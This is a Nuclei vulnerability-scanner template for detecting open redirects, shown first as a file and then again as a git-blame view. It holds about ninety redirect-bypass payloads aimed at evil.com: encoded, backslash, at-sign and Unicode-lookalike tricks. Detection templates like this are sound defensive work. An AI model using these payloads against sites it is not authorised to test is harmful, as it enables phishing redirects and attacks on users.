nuclei-templates/headless/headless-open-redirect.yaml

id: headless-open-redirect

info:
  name: Open Redirect - Detect
  author: theamanrawat
  severity: medium
  description: |
    An open redirect was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  tags: redirect,generic,headless

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/{{redirect}}'
        action: navigate
      - action: waitload

    payloads:
      redirect:
        - '%0a/evil.com/'
        - '%0d/evil.com/'
        - '%00/evil.com/'
        - '%09/evil.com/'
        - '%5C%5Cevil.com/%252e%252e%252f'
        - '%5Cevil.com'
        - '%5cevil.com/%2f%2e%2e'
        - '%5c{{RootURL}}evil.com/%2f%2e%2e'
        - '../evil.com'
        - '.evil.com'
        - '/%5cevil.com'
        - '////\;@evil.com'
        - '////evil.com'
        - '///evil.com'
        - '///evil.com/%2f%2e%2e'
        - '///evil.com@//'
        - '///{{RootURL}}evil.com/%2f%2e%2e'
        - '//;@evil.com'
        - '//\/evil.com/'
        - '//\@evil.com'
        - '//\evil.com'
        - '//\tevil.com/'
        - '//evil.com/%2F..'
        - '//evil.com//'
        - '//%69%6e%74%65%72%61%63%74%2e%73%68'
        - '//evil.com@//'
        - '//evil.com\tevil.com/'
        - '//https://evil.com@//'
        - '/<>//evil.com'
        - '/\/\/evil.com/'
        - '/\/evil.com'
        - '/\evil.com'
        - '/evil.com'
        - '/evil.com/%2F..'
        - '/evil.com/'
        - '/evil.com/..;/css'
        - '/https:evil.com'
        - '/{{RootURL}}evil.com/'
        - '/〱evil.com'
        - '/〵evil.com'
        - '/ゝevil.com'
        - '/ーevil.com'
        - '/ｰevil.com'
        - '<>//evil.com'
        - '@evil.com'
        - '@https://evil.com'
        - '\/\/evil.com/'
        - 'evil%E3%80%82com'
        - 'evil.com'
        - 'evil.com/'
        - 'evil.com//'
        - 'evil.com;@'
        - 'https%3a%2f%2fevil.com%2f'
        - 'https:%0a%0devil.com'
        - 'https://%0a%0devil.com'
        - 'https://%09/evil.com'
        - 'https://%2f%2f.evil.com/'
        - 'https://%3F.evil.com/'
        - 'https://%5c%5c.evil.com/'
        - 'https://%5cevil.com@'
        - 'https://%23.evil.com/'
        - 'https://.evil.com'
        - 'https://////evil.com'
        - 'https:///evil.com'
        - 'https:///evil.com/%2e%2e'
        - 'https:///evil.com/%2f%2e%2e'
        - 'https:///evil.com@evil.com/%2e%2e'
        - 'https:///evil.com@evil.com/%2f%2e%2e'
        - 'https://:80#@evil.com/'
        - 'https://:80?@evil.com/'
        - 'https://:@\@evil.com'
        - 'https://:@evil.com\@evil.com'
        - 'https://;@evil.com'
        - 'https://\tevil.com/'
        - 'https://evil.com/evil.com'
        - 'https://evil.com/https://evil.com/'
        - 'https://www.\.evil.com'
        - 'https:/\/\evil.com'
        - 'https:/\evil.com'
        - 'https:/evil.com'
        - 'https:evil.com'
        - '{{RootURL}}evil.com'
        - '〱evil.com'
        - '〵evil.com'
        - 'ゝevil.com'
        - 'ーevil.com'
        - 'ｰevil.com'
        - 'redirect/evil.com'
        - 'cgi-bin/redirect.cgi?evil.com'
        - 'out?evil.com'
        - 'login?to=http://evil.com'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "evil.com"
          - "Evil.Com - We get it...Daily."
        condition: and

# Enhanced by cs on 2023/03/10
Added template for headless-open-redirect 2023-01-14 06:07:32 +00:00			`id: headless-open-redirect`

			`info:`
Enhancement: headless/headless-open-redirect.yaml by md 2023-03-08 16:25:23 +00:00			`name: Open Redirect - Detect`
Added template for headless-open-redirect 2023-01-14 06:07:32 +00:00			`author: theamanrawat`
Enhancement: headless/headless-open-redirect.yaml by cs 2023-03-10 18:38:43 +00:00			`severity: medium`
updated tags 2023-01-23 10:34:15 +00:00			`description: \|`
Enhancement: headless/headless-open-redirect.yaml by cs 2023-03-10 18:38:43 +00:00			`An open redirect was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cwe-id: CWE-601`
updated tags 2023-01-23 10:34:15 +00:00			`tags: redirect,generic,headless`
Added template for headless-open-redirect 2023-01-14 06:07:32 +00:00
			`headless:`
			`- steps:`
			`- args:`
Yamllint fix 2023-01-14 06:16:39 +00:00			`url: '{{BaseURL}}/{{redirect}}'`
Added template for headless-open-redirect 2023-01-14 06:07:32 +00:00			`action: navigate`
			`- action: waitload`

			`payloads:`
			`redirect:`
			`- '%0a/evil.com/'`
			`- '%0d/evil.com/'`
			`- '%00/evil.com/'`
			`- '%09/evil.com/'`
			`- '%5C%5Cevil.com/%252e%252e%252f'`
			`- '%5Cevil.com'`
			`- '%5cevil.com/%2f%2e%2e'`
			`- '%5c{{RootURL}}evil.com/%2f%2e%2e'`
			`- '../evil.com'`
			`- '.evil.com'`
			`- '/%5cevil.com'`
			`- '////\;@evil.com'`
			`- '////evil.com'`
			`- '///evil.com'`
			`- '///evil.com/%2f%2e%2e'`
			`- '///evil.com@//'`
			`- '///{{RootURL}}evil.com/%2f%2e%2e'`
			`- '//;@evil.com'`
			`- '//\/evil.com/'`
			`- '//\@evil.com'`
			`- '//\evil.com'`
			`- '//\tevil.com/'`
			`- '//evil.com/%2F..'`
			`- '//evil.com//'`
			`- '//%69%6e%74%65%72%61%63%74%2e%73%68'`
			`- '//evil.com@//'`
			`- '//evil.com\tevil.com/'`
			`- '//https://evil.com@//'`
			`- '/<>//evil.com'`
			`- '/\/\/evil.com/'`
			`- '/\/evil.com'`
			`- '/\evil.com'`
			`- '/evil.com'`
			`- '/evil.com/%2F..'`
			`- '/evil.com/'`
			`- '/evil.com/..;/css'`
			`- '/https:evil.com'`
			`- '/{{RootURL}}evil.com/'`
			`- '/〱evil.com'`
			`- '/〵evil.com'`
			`- '/ゝevil.com'`
			`- '/ーevil.com'`
			`- '/ｰevil.com'`
			`- '<>//evil.com'`
			`- '@evil.com'`
			`- '@https://evil.com'`
			`- '\/\/evil.com/'`
			`- 'evil%E3%80%82com'`
			`- 'evil.com'`
			`- 'evil.com/'`
			`- 'evil.com//'`
			`- 'evil.com;@'`
			`- 'https%3a%2f%2fevil.com%2f'`
			`- 'https:%0a%0devil.com'`
			`- 'https://%0a%0devil.com'`
			`- 'https://%09/evil.com'`
			`- 'https://%2f%2f.evil.com/'`
			`- 'https://%3F.evil.com/'`
			`- 'https://%5c%5c.evil.com/'`
			`- 'https://%5cevil.com@'`
			`- 'https://%23.evil.com/'`
			`- 'https://.evil.com'`
			`- 'https://////evil.com'`
			`- 'https:///evil.com'`
			`- 'https:///evil.com/%2e%2e'`
			`- 'https:///evil.com/%2f%2e%2e'`
			`- 'https:///evil.com@evil.com/%2e%2e'`
			`- 'https:///evil.com@evil.com/%2f%2e%2e'`
			`- 'https://:80#@evil.com/'`
			`- 'https://:80?@evil.com/'`
			`- 'https://:@\@evil.com'`
			`- 'https://:@evil.com\@evil.com'`
			`- 'https://;@evil.com'`
			`- 'https://\tevil.com/'`
			`- 'https://evil.com/evil.com'`
			`- 'https://evil.com/https://evil.com/'`
			`- 'https://www.\.evil.com'`
			`- 'https:/\/\evil.com'`
			`- 'https:/\evil.com'`
			`- 'https:/evil.com'`
			`- 'https:evil.com'`
			`- '{{RootURL}}evil.com'`
			`- '〱evil.com'`
			`- '〵evil.com'`
			`- 'ゝevil.com'`
			`- 'ーevil.com'`
			`- 'ｰevil.com'`
			`- 'redirect/evil.com'`
			`- 'cgi-bin/redirect.cgi?evil.com'`
			`- 'out?evil.com'`
			`- 'login?to=http://evil.com'`

			`stop-at-first-match: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "evil.com"`
			`- "Evil.Com - We get it...Daily."`
updated tags 2023-01-23 10:34:15 +00:00			`condition: and`
Enhancement: headless/headless-open-redirect.yaml by md 2023-03-08 16:25:23 +00:00
Enhancement: headless/headless-open-redirect.yaml by cs 2023-03-10 18:38:43 +00:00			`# Enhanced by cs on 2023/03/10`